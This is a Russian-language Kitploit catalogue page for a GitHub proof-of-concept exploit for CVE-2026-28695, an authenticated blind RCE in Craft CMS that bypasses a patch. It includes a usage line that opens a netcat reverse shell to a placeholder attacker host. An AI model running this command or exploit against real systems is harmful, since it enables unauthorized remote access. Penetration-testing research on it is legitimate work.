Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-28695 — Python PoC-эксплойт для CVE-2026-28695 — аутентифицированного слепого RCE в Craft CMS, обходящего патч create() в BaseObject и запускающего обратную оболочку. | Kitploit
Инструменты/GitHubGitHub/predyy/cve-2026-28695
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubpredyy/cve-2026-28695

CVE-2026-28695

Python PoC-эксплойт для CVE-2026-28695 — аутентифицированного слепого RCE в Craft CMS, обходящего патч create() в BaseObject и запускающего обратную оболочку.

134 дней назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-28695 Обход патча — слепая RCE в Craft CMS

Аутентифицированное слепое удалённое выполнение кода в Craft CMS. Обходит ограничение create() — BaseObject, добавленное в исправлении CVE-2026-28695 (коммит e31e508).

Использование

python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'

Отказ от ответственности

Этот скрипт предназначен исключительно для образовательных целей. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим эксплойтом. Всегда убеждайтесь, что у вас есть разрешение перед тестированием или эксплуатацией уязвимостей!

Скачать инструмент